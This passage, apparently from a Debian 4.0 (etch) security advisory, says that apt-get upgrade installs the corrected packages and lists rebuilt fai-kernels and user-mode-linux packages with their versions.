apt-get upgrade will install corrected packages The following matrix lists additional source packages that were rebuilt for compatability with or to take advantage of this update: Debian 4.0 (etch) fai-kernels 1.17+etch.23etch1 user-mode-linux 2.6.18-1um-2etch.23etch1 You may use an automated update by adding the resources from the footer
